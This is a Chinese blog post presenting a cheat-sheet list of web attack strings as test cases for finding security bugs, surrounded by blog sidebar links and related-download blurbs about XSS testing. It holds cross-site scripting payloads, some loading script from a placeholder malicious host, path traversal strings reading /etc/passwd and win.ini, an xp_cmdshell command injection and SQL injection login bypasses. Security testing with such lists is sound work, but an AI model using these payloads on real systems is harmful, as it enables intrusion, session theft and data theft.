- 浏览: 390048 次
- 性别:
- 来自: 长春
文章分类
最新评论
-
milkyTea_:
...
学习:二维码、QR码、J4L-QRCode、java -
xunke515:
请问如何更换其他用户,注销了从新登录的时候选择么?
Hadoop启动时出现Unrecognized option: -jvm 和 Could not create the Java virtual machine -
_copythat:
学习:二维码、QR码、J4L-QRCode、java -
小fi(FD):
楼主,你好,关于你发表的《基于动态表单的Java不确定字段数报 ...
基于动态表单的Java不确定字段数报表项目实现 -
rmn190:
受用了。多谢分享!
SD2见闻--参加PPT制作秘笈沙龙
测试用例:还是挺管用的,真的能发现潜在的bug
<script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<script>alert('XSS')</script>
<img src="javascript:alert('XSS')">
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
%22%3cscript%3ealert(%22x ss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22x ss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22x ss%22)%3c/script%3e
%3cscript%3ealert(%22x ss%22)%3c/script%3e/index.html
<script>alert('Vulnerable');</script>
<script>alert('Vulnerable')</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert('Vulnerable')</script>
a?<script>alert('Vulnerable')</script>
"><script>alert('Vulnerable')</script>
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="javascript:alert('XSS');">
"<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<IMG SRC=" javascript:alert('XSS');">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<BGSOUND SRC="javascript:alert('XSS');">
<br size="&{alert('XSS')}">
<LAYER SRC="http://惡意網址/a.js"></layer>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<IFRAME SRC=javascript:alert('XSS')></IFRAME>
<FRAMESET><FRAME SRC=javascript:alert('XSS')></FRAME></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="behaviour: url('http://惡意網址/exploit.html');">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE='x ss:expre\ssion(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<BASE HREF="javascript:alert('XSS');//">
getURL("javascript:alert('XSS')")
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
<XML SRC="javascript:alert('XSS');">
"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
<SCRIPT SRC="http://惡意網址/x ss.jpg"></SCRIPT>
<IMG SRC="javascript:alert('XSS')"
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://惡意網址/a.js></SCRIPT>'"-->
<IMG SRC="http://惡意網址/somecommand.php?somevariables=maliciouscode">
<SCRIPT a=">" SRC="http://惡意網址/a.js"></SCRIPT>
<SCRIPT =">" SRC="http://惡意網址/a.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://惡意網址/a.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://惡意網址/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://惡意網址/a.js"></SCRIPT>
<A HREF=http://惡意網址/>link</A>
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="aXSS測試語法><script>alert(document.cookie)</script>
发表评论
-
ChromeFireFox等浏览器的Java插件安装说明
2014-07-25 09:38 809Java插件安装说明 正常情况浏览器自动检测提示安装插件 ... -
解决tomcat默认45s启动超时的问题
2013-02-01 00:25 1026进入你的工作空间的这个目次下 E: ... -
推荐一款开源的兼容html5的视频音频播放插件——JW Player
2012-09-23 09:58 1478http://www.longtailvideo.com/pl ... -
FB4.5
2011-07-30 20:27 8874.5和4有点不一样,貌似在修改Hosts文件之前输入序列 ... -
Sliding into WebDAV(slide,Webdav的实现)
2011-05-12 13:00 2099最近在做WebDav,感觉这 ... -
基于WEBDAV的在线编辑器
2011-05-12 12:44 2389以前如果用户需要编辑服务器上的文档,首先需要通过ftp下载到本 ... -
WebDAV有哪些优点&WebDAV配置
2011-05-10 23:01 175715.2 WebDAV有哪些优点高效性:相对于即时聊天, ... -
浏览器的加载与页面性能优化
2011-03-02 22:24 905本文将探讨浏览器渲染的loading过程,主要有2个目 ... -
50个Web设计师超便利的工具
2010-10-13 21:41 965作为一个 Web 设计师并不容易,不仅考虑设计与架构,还要 ... -
什么是全球网络的主色调?
2010-09-19 22:30 1027COLOURlovers不久前对社交网络的主色调进行了调查 ... -
国外优秀免费空间不完全名单
2010-07-29 23:16 12101. 全能 PHP/MySQL 空间最 ... -
Sf.net(sourceforge.net)稳定免费空间支持php,mysql数据库,绑定域名
2010-07-26 09:17 2930Sf.net(sourceforge.net)稳定 ... -
sf.net/mysql/ssh/sftp稳定老免费空间
2010-07-26 09:17 1216sourceforge.net 作为世界上最大的开源托管网站 ... -
x5s 发布-自动化的XSS安全性辅助测试工具
2010-07-19 14:09 1543x5s是Fiddler的一个插件 ,旨在帮助渗透测试人员发 ... -
大型网站架构演变和知识体系【架构演变第十步:进入大型分布式应用时代和廉价服务器群梦想时代】
2010-07-13 10:32 979架构演变第十步:进入大型分布式应用时代和廉价服务器群梦想时代 ... -
大型网站架构演变和知识体系【 架构演变第九步:数据读写分离和廉价存储方案】
2010-07-13 10:30 1089架构演变第九步:数 ... -
大型网站架构演变和知识体系【架构演变第八步:增加更多的webserver】
2010-07-13 10:29 979架构演变第八步:增加更多的webserver 在做完分库分表 ... -
大型网站架构演变和知识体系【架构演变第七步:分表、DAL和分布式缓存】
2010-07-13 10:27 1229架构演变第七步:分表 ... -
大型网站架构演变和知识体系【架构演变第六步:分库】
2010-07-13 10:26 912架构演变第六步:分库 享受了一段时间的系统访问量高速增长的幸 ... -
大型网站架构演变和知识体系【架构演变第五步: 增加webserver】
2010-07-13 10:23 727架构演变第五步: 增加webserver 好景不长,发现随着 ...
相关推荐
XSS测试代码 安全测试 XSS测试代码大全
简单XSS测试脚本 一、实验目的 了解XSS的有关知识; 了解XSS的实际操作; 了解XSS的攻击原理。 二、实验内容 在主机上搭建pikachu站点; 在站点上进行简单XSS测试脚本。 三、实验内容与步骤 在主机上搭建pikachu站点...
安全测试之XSS.doc
这是大三时软件测试课程的结课论文,论文题目是:《关于Web应用安全中XSS漏洞测试方法的研究》。
Web安全测试之XSS,
从测试XSS漏洞,教你如何测试安全漏洞,打开文档有详细步骤
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
Web安全测试之XSS XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者...
测试工程师目前主要采用两种方法做安全测试,一种是采用自动化安全工具Hatrix扫描测试,自动化安全工具主要能够覆盖XSS、CSRF、SQL Injection,一种是对URL Redirect和Access control这两种漏洞采用手工方式进行测试...
E076-PHP应用安全-存储型XSS漏洞开发及渗透测试
WEB安全测试分类及防范测试方法 1 Web 应用程序布署环境测试 2 1.1HTTP 请求引发漏洞的测试 2 1.2 操作系统目录安全性及Web 应用程序布署环境目录遍历问题测试 2 2 应用程序测试 3 2.1 SQL 注入漏洞测试 3 ...
XSS学习资料,安全编程新手必备 内容是PPT课件形式,包含XSS测试代码,可供参考
在这篇文章中我将说明所有关于XSS以及更多相关的知识.通过这篇文档,我希望能让你明白什么是XSS,为什么使用XSS,以及怎样使用XSS.一旦你学会了,你将需要发挥自己的创造力...同时我将阐述的不仅仅是XSS,而是所有的web安全.
XSS跨站脚本攻击剖析与防御》是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做...
XSS跨站脚本攻击剖析与防御是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做了...
经典的xss注入通关游戏,搭建简单。适合网络安全测试人员
《XSS跨站脚本攻击剖析与防御》是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式...
Web应用安全:存储型XSS习题(实验习题).docx
XSSer——用于检测和利用XSS漏洞的自动Web测试框架工具 XSS是一种非常常见的漏洞类型,它分布非常广泛,且比较容易被检测到。 攻击者可以在无需验证的情况下将不受信任的JavaScript片段插入到应用程序中。然后,该...
自动化检测XSS漏洞插件,希望对大家使用有帮助,一起进步,一起分享